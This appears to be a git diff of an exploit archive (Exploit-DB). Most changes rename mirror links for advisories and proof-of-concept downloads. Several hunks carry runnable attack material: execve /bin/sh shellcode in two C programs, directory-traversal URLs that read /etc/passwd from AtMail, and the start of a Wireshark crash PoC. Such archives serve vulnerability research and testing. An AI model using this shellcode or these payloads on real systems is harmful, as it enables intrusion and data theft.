+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/36858.c b/platforms/lin_x86-64/shellcode/36858.c
index cf0636ca9..f3e465659 100755
--- a/platforms/lin_x86-64/shellcode/36858.c
+++ b/platforms/lin_x86-64/shellcode/36858.c
@@ -52,10 +52,10 @@ _start:
int
main(void)
{
- char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
-\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
+ char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
+ "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
- printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
+ printf("strlen(shellcode)=%d\n", strlen(shellcode));
((void (*)(void))shellcode)();
diff --git a/platforms/lin_x86/shellcode/13366.txt b/platforms/lin_x86/shellcode/13366.txt
index 07715dfcb..1880fe574 100755
--- a/platforms/lin_x86/shellcode/13366.txt
+++ b/platforms/lin_x86/shellcode/13366.txt
@@ -1,5 +1,5 @@
# linux/x86 xor-encoded Connect Back Shellcode 371 bytes
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13366.tar.gz (black-RXenc-con-back.tar.gz)
# milw0rm.com [2006-04-18]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/36857.c b/platforms/lin_x86/shellcode/36857.c
index 8fa77c049..c02969b4b 100755
--- a/platforms/lin_x86/shellcode/36857.c
+++ b/platforms/lin_x86/shellcode/36857.c
@@ -49,12 +49,12 @@ _start:
int
main(void)
{
- char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=
-\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+ char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
+ "\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
- printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
+ printf("strlen(shellcode)=%d\n", strlen(shellcode));
((void (*)(void))shellcode)();
return 0;
-}
+}
\ No newline at end of file
diff --git a/platforms/linux/dos/10203.txt b/platforms/linux/dos/10203.txt
index a18cfa2c3..01162ad5d 100755
--- a/platforms/linux/dos/10203.txt
+++ b/platforms/linux/dos/10203.txt
@@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2
\ No newline at end of file
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
\ No newline at end of file
diff --git a/platforms/linux/dos/10206.txt b/platforms/linux/dos/10206.txt
index bc140dbe9..0d5a3879b 100755
--- a/platforms/linux/dos/10206.txt
+++ b/platforms/linux/dos/10206.txt
@@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
Expat 2.0.1 is vulnerable; other versions may also be affected.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-1.gz (2009-11-22-36097.gz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-2.gz (2009-11-22-36097-2.gz)
\ No newline at end of file
diff --git a/platforms/linux/dos/14573.txt b/platforms/linux/dos/14573.txt
index c3f7b4048..ecb434adc 100755
--- a/platforms/linux/dos/14573.txt
+++ b/platforms/linux/dos/14573.txt
@@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
Versions up to and including libTIFF 3.9.4 are vulnerable.
PoC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14573.tif.gz (lp589145-sample.tif.gz)
\ No newline at end of file
diff --git a/platforms/linux/dos/18295.txt b/platforms/linux/dos/18295.txt
index 63f4983e3..b3aaaffe8 100755
--- a/platforms/linux/dos/18295.txt
+++ b/platforms/linux/dos/18295.txt
@@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
--
http://pi3.com.pl
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)
http://blog.pi3.com.pl/?p=277
diff --git a/platforms/linux/dos/35081.txt b/platforms/linux/dos/35081.txt
index c499daf04..253c1bd8d 100755
--- a/platforms/linux/dos/35081.txt
+++ b/platforms/linux/dos/35081.txt
@@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081
+EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
...
$ strings strings-bfd-badptr2
diff --git a/platforms/linux/local/1596.txt b/platforms/linux/local/1596.txt
index 3db23b543..422181b32 100755
--- a/platforms/linux/local/1596.txt
+++ b/platforms/linux/local/1596.txt
@@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
-# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xmodulepath.tgz
+# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1596.tgz (xmodulepath.tgz)
# milw0rm.com [2006-03-20]
diff --git a/platforms/linux/local/1831.txt b/platforms/linux/local/1831.txt
index b7b527798..d3876cd9c 100755
--- a/platforms/linux/local/1831.txt
+++ b/platforms/linux/local/1831.txt
@@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function).
.bss section is in higher addresses than .dtors section, so, we
can't hijack .dtors to....
-PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05262006-tiffspl33t.tar.gz
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz)
nitr0us
diff --git a/platforms/linux/local/34421.c b/platforms/linux/local/34421.c
index 90585e435..88e01300d 100755
--- a/platforms/linux/local/34421.c
+++ b/platforms/linux/local/34421.c
@@ -1,5 +1,5 @@
//
-// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2014-5119.tar.gz
+// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz)
//
//
// ---------------------------------------------------
diff --git a/platforms/linux/local/35749.txt b/platforms/linux/local/35749.txt
index 7d800cec3..fd673f01f 100755
--- a/platforms/linux/local/35749.txt
+++ b/platforms/linux/local/35749.txt
@@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root.
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/redstarroot.rpm
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35749.rpm (redstarroot.rpm)
## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
diff --git a/platforms/linux/local/3730.txt b/platforms/linux/local/3730.txt
index 92decafd2..3b4e77aec 100755
--- a/platforms/linux/local/3730.txt
+++ b/platforms/linux/local/3730.txt
@@ -1,5 +1,5 @@
ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04132007-pr0ftpd_modctrls.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz)
# milw0rm.com [2007-04-13]
diff --git a/platforms/linux/local/7855.txt b/platforms/linux/local/7855.txt
index 7ae3b24de..6ec6e2e07 100755
--- a/platforms/linux/local/7855.txt
+++ b/platforms/linux/local/7855.txt
@@ -3,6 +3,6 @@ PostgreSQL UDF for command execution
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
-mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz
+mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz)
# milw0rm.com [2009-01-25]
diff --git a/platforms/linux/local/7856.txt b/platforms/linux/local/7856.txt
index d4386b4c9..8df13808f 100755
--- a/platforms/linux/local/7856.txt
+++ b/platforms/linux/local/7856.txt
@@ -3,6 +3,6 @@ MySQL UDF for command execution
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
-mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz
+mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz)
# milw0rm.com [2009-01-25]
diff --git a/platforms/linux/local/9191.txt b/platforms/linux/local/9191.txt
index 2cd837399..1c9bb3a77 100755
--- a/platforms/linux/local/9191.txt
+++ b/platforms/linux/local/9191.txt
@@ -301,6 +301,6 @@
http://grsecurity.net/~spender/cheddar_bay.tgz
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-cheddar_bay.tgz
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz (2009-cheddar_bay.tgz)
# milw0rm.com [2009-07-17]
diff --git a/platforms/linux/local/9208.txt b/platforms/linux/local/9208.txt
index 116c758ea..bb63943ad 100755
--- a/platforms/linux/local/9208.txt
+++ b/platforms/linux/local/9208.txt
@@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
GenuineIntel GNU/Linux
------------------------------------
-download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-pulseaudio-exp.tar.gz
+download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)
# milw0rm.com [2009-07-20]
diff --git a/platforms/linux/local/9435.txt b/platforms/linux/local/9435.txt
index a761a11c1..eeea1df59 100755
--- a/platforms/linux/local/9435.txt
+++ b/platforms/linux/local/9435.txt
@@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
*/
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wunderbar_emporium.tgz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
# milw0rm.com [2009-08-14]
diff --git a/platforms/linux/local/9436.txt b/platforms/linux/local/9436.txt
index 7c4b9481b..14bb519b8 100755
--- a/platforms/linux/local/9436.txt
+++ b/platforms/linux/local/9436.txt
@@ -4,6 +4,6 @@
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-proto_ops.tgz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
# milw0rm.com [2009-08-14]
diff --git a/platforms/linux/local/9574.txt b/platforms/linux/local/9574.txt
index fdeca704a..9b379a38e 100755
--- a/platforms/linux/local/9574.txt
+++ b/platforms/linux/local/9574.txt
@@ -16,6 +16,6 @@
*/
main: http://grsecurity.net/~spender/therebel.tgz
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-therebel.tgz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz (2009-therebel.tgz)
# milw0rm.com [2009-09-02]
diff --git a/platforms/linux/local/9598.txt b/platforms/linux/local/9598.txt
index 2d07df1d7..06067f66d 100755
--- a/platforms/linux/local/9598.txt
+++ b/platforms/linux/local/9598.txt
@@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for
types with mmap_zero permission it can transition, and tries to exploit
the system with that types.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage2.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz)
# milw0rm.com [2009-09-09]
diff --git a/platforms/linux/local/9627.txt b/platforms/linux/local/9627.txt
index 461732494..2451a8caa 100755
--- a/platforms/linux/local/9627.txt
+++ b/platforms/linux/local/9627.txt
@@ -37,6 +37,6 @@
*/
http://www.grsecurity.net/~spender/enlightenment.tgz
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-enlightenment.tgz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9627.tgz (2009-enlightenment.tgz)
# milw0rm.com [2009-09-10]
diff --git a/platforms/linux/local/9641.txt b/platforms/linux/local/9641.txt
index e7831f908..c6690ea4d 100755
--- a/platforms/linux/local/9641.txt
+++ b/platforms/linux/local/9641.txt
@@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions
on exploit code and libc can be referenced); Improved search and
transition to SELinux types with mmap_zero permission.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage3.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz)
# milw0rm.com [2009-09-11]
diff --git a/platforms/linux/remote/3021.txt b/platforms/linux/remote/3021.txt
index a3171f4f5..756b172d6 100755
--- a/platforms/linux/remote/3021.txt
+++ b/platforms/linux/remote/3021.txt
@@ -2,6 +2,6 @@
# solareclipse at phreedom dot org
# GPG key ID: E36B11B7
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-proftpd-not-pro-enough.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
# milw0rm.com [2003-10-15]
diff --git a/platforms/linux/remote/37007.txt b/platforms/linux/remote/37007.txt
new file mode 100755
index 000000000..efb52435b
--- /dev/null
+++ b/platforms/linux/remote/37007.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/52684/info
+
+AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input.
+
+An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process.
+
+Atmail 1.04 is vulnerable; other versions may also be affected.
+
+https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd
+
+https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd
+
+https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html
\ No newline at end of file
diff --git a/platforms/linux/remote/5386.txt b/platforms/linux/remote/5386.txt
index a6fd0b194..524a96b27 100755
--- a/platforms/linux/remote/5386.txt
+++ b/platforms/linux/remote/5386.txt
@@ -52,6 +52,6 @@
**
*/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-x2_fc6f7f8.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)
# milw0rm.com [2008-04-06]
diff --git a/platforms/linux/remote/5720.py b/platforms/linux/remote/5720.py
index 373982f7f..40849a844 100755
--- a/platforms/linux/remote/5720.py
+++ b/platforms/linux/remote/5720.py
@@ -17,7 +17,7 @@
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
-# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
+# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
# 2. Extract it to a directory
#
diff --git a/platforms/linux/remote/609.txt b/platforms/linux/remote/609.txt
index b4c96c234..95326c65f 100755
--- a/platforms/linux/remote/609.txt
+++ b/platforms/linux/remote/609.txt
@@ -1,4 +1,4 @@
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ximage_zgv.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
# milw0rm.com [2004-10-28]
diff --git a/platforms/linux/remote/7701.txt b/platforms/linux/remote/7701.txt
index 2fb8f2a00..8cf994aad 100755
--- a/platforms/linux/remote/7701.txt
+++ b/platforms/linux/remote/7701.txt
@@ -36,6 +36,6 @@ struct versions vers[VERSN] =
{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
};
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lsa.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7701.zip (2009-lsa.zip)
# milw0rm.com [2009-01-08]
diff --git a/platforms/linux/webapps/30085.txt b/platforms/linux/webapps/30085.txt
index c4eb3eaa0..84ee2ca28 100755
--- a/platforms/linux/webapps/30085.txt
+++ b/platforms/linux/webapps/30085.txt
@@ -8,7 +8,7 @@
# CVE : No CVE, no patch just 0Day
# State : Critical
-# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zimbraexploit_rubina119.zip
+# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
diff --git a/platforms/multiple/dos/10205.txt b/platforms/multiple/dos/10205.txt
index a3c28b5d9..4eacf6ce7 100755
--- a/platforms/multiple/dos/10205.txt
+++ b/platforms/multiple/dos/10205.txt
@@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-35451.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10205.zip (2009-11-22-35451.zip)
\ No newline at end of file
diff --git a/platforms/multiple/dos/11142.txt b/platforms/multiple/dos/11142.txt
index 7a9793174..5d8a81961 100755
--- a/platforms/multiple/dos/11142.txt
+++ b/platforms/multiple/dos/11142.txt
@@ -45,4 +45,4 @@ Not Vulnerable:
Firefox 3.5.3 on Windows crashed once but not reliably.
PoC Packagetx:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE_ScaryMovie_Study.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip)
diff --git a/platforms/multiple/dos/14268.txt b/platforms/multiple/dos/14268.txt
index 6bd951309..f51d9a7da 100755
--- a/platforms/multiple/dos/14268.txt
+++ b/platforms/multiple/dos/14268.txt
@@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on.
http://aluigi.org/poc/qtsslame.zip
or
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/qtsslame.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14268.zip (qtsslame.zip)
#######################################################################
diff --git a/platforms/multiple/dos/14761.txt b/platforms/multiple/dos/14761.txt
index e13f30920..28d224d00 100755
--- a/platforms/multiple/dos/14761.txt
+++ b/platforms/multiple/dos/14761.txt
@@ -9,7 +9,7 @@ Website : http://www.itsecteam.com
Forum : http://forum.ITSecTeam.com
---------------------------------------------------------------------------
Advisory URL: http://itsecteam.com/en/papers/paper11.htm
-POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adb_poc.zip
+POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14761.zip (adb_poc.zip)
---------------------------------------------------------------------------
System Affected:
Adobe Acrobat reader 7.x
diff --git a/platforms/multiple/dos/15086.py b/platforms/multiple/dos/15086.py
index 422929b43..ea29c5488 100755
--- a/platforms/multiple/dos/15086.py
+++ b/platforms/multiple/dos/15086.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15086.zip (moaub-23-exploit.zip)
'''
'''
diff --git a/platforms/multiple/dos/15215.txt b/platforms/multiple/dos/15215.txt
index 6cf08a5cb..a75b466c9 100755
--- a/platforms/multiple/dos/15215.txt
+++ b/platforms/multiple/dos/15215.txt
@@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc.
0day remote ftpd Denial-of-Service:
http://cxib.net/stuff/glob-0day.c
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/glob-0day.c
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15215.c (glob-0day.c)
- --- 3. Fix ---
Oracle 25.09.2010 CET: Being fixed in main codeline
diff --git a/platforms/multiple/dos/15261.txt b/platforms/multiple/dos/15261.txt
index 84d5a3ce1..86ce5f5ea 100755
--- a/platforms/multiple/dos/15261.txt
+++ b/platforms/multiple/dos/15261.txt
@@ -64,7 +64,7 @@ The effects of the problem can be:
http://aluigi.org/poc/soliddb_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/soliddb_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15261.zip
#######################################################################
diff --git a/platforms/multiple/dos/15676.txt b/platforms/multiple/dos/15676.txt
index 12f90d6f6..251a111a5 100755
--- a/platforms/multiple/dos/15676.txt
+++ b/platforms/multiple/dos/15676.txt
@@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv
This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1.
-PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676_pcap.zip
\ No newline at end of file
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676-pcap.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/15707.txt b/platforms/multiple/dos/15707.txt
index b814f7905..76f8b5fca 100755
--- a/platforms/multiple/dos/15707.txt
+++ b/platforms/multiple/dos/15707.txt
@@ -93,7 +93,7 @@ memory location:
http://aluigi.org/testz/udpsz.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15707.zip (udpsz.zip)
udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
diff --git a/platforms/multiple/dos/15973.txt b/platforms/multiple/dos/15973.txt
index 985267bbe..dfbdccc29 100755
--- a/platforms/multiple/dos/15973.txt
+++ b/platforms/multiple/dos/15973.txt
@@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l
Wireshark 1.4.0 to 1.4.1 are vulnerable.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/44986.pcap
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15973.pcap (44986.pcap)
\ No newline at end of file
diff --git a/platforms/multiple/dos/1709.txt b/platforms/multiple/dos/1709.txt
index e9f849b6e..3431d932e 100755
--- a/platforms/multiple/dos/1709.txt
+++ b/platforms/multiple/dos/1709.txt
@@ -18,5 +18,5 @@ Author: Luigi Auriemma
#######################################################################
-Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-openttdx.zip
+Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1709.zip (04232006-openttdx.zip)
diff --git a/platforms/multiple/dos/17201.php b/platforms/multiple/dos/17201.php
index c1086c4b1..243eff648 100755
--- a/platforms/multiple/dos/17201.php
+++ b/platforms/multiple/dos/17201.php
@@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar');
?>
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.phar.tar
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17201.phar.tar (poc.phar.tar)
\ No newline at end of file
diff --git a/platforms/multiple/dos/1801.txt b/platforms/multiple/dos/1801.txt
index 2ffec9394..7d0605780 100755
--- a/platforms/multiple/dos/1801.txt
+++ b/platforms/multiple/dos/1801.txt
@@ -1,5 +1,5 @@
# libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-libextho.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1801.zip (05172006-libextho.zip)
# milw0rm.com [2006-05-17]
diff --git a/platforms/multiple/dos/1820.txt b/platforms/multiple/dos/1820.txt
index 93820547e..1ea60b232 100755
--- a/platforms/multiple/dos/1820.txt
+++ b/platforms/multiple/dos/1820.txt
@@ -1,5 +1,5 @@
# netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05232006-panza.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
# milw0rm.com [2006-05-23]
diff --git a/platforms/multiple/dos/2587.txt b/platforms/multiple/dos/2587.txt
index eede8d41d..9480f6bb3 100755
--- a/platforms/multiple/dos/2587.txt
+++ b/platforms/multiple/dos/2587.txt
@@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl
pucik[@]overflow.pl
http://overflow.pl
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10172006-clam_petite_heap.exe.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
# milw0rm.com [2006-10-17]
diff --git a/platforms/multiple/dos/2910.txt b/platforms/multiple/dos/2910.txt
index 48fddcd61..d4a055de6 100755
--- a/platforms/multiple/dos/2910.txt
+++ b/platforms/multiple/dos/2910.txt
@@ -1,5 +1,5 @@
Sophos Antivirus CHM File Heap Overflow Vulnerability
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_chunkheap.chm
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2910.chm (12092006-sophos_chunkheap.chm)
# milw0rm.com [2006-12-10]
diff --git a/platforms/multiple/dos/2911.txt b/platforms/multiple/dos/2911.txt
index 7753b231e..890a21ab7 100755
--- a/platforms/multiple/dos/2911.txt
+++ b/platforms/multiple/dos/2911.txt
@@ -1,5 +1,5 @@
Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_namelen.chm
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
# milw0rm.com [2006-12-10]
diff --git a/platforms/multiple/dos/2912.txt b/platforms/multiple/dos/2912.txt
index fc71d8ea1..4c1d6a0f4 100755
--- a/platforms/multiple/dos/2912.txt
+++ b/platforms/multiple/dos/2912.txt
@@ -1,5 +1,5 @@
Multiple Vendor Antivirus RAR File Denial of Service Vulnerability
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12102006-sophos_intifiniti.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2912.rar (12102006-sophos_intifiniti.rar)
# milw0rm.com [2006-12-10]
diff --git a/platforms/multiple/dos/36840.py b/platforms/multiple/dos/36840.py
new file mode 100755
index 000000000..4acce5b7b
--- /dev/null
+++ b/platforms/multiple/dos/36840.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
+# AUTHOR: Avinash Kumar Thapa "-Acid"
+# Date of Testing: 26th April'2015
+# Vendor Homepage: http://www.wireshark.org
+# Tested On : Windows 8.1 Pro
+# Steps to Reproduce the Crash
+# Step 1: Create a File Using PoC
+# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
+# Step 3: Click "Apply"
+# Some other places for the Crash are:
+# Statistics > IP Statistics then any of the field you can use.
+# Statistics > Packet Length > Paste the buffer in the field
+# Statistics > ANCP
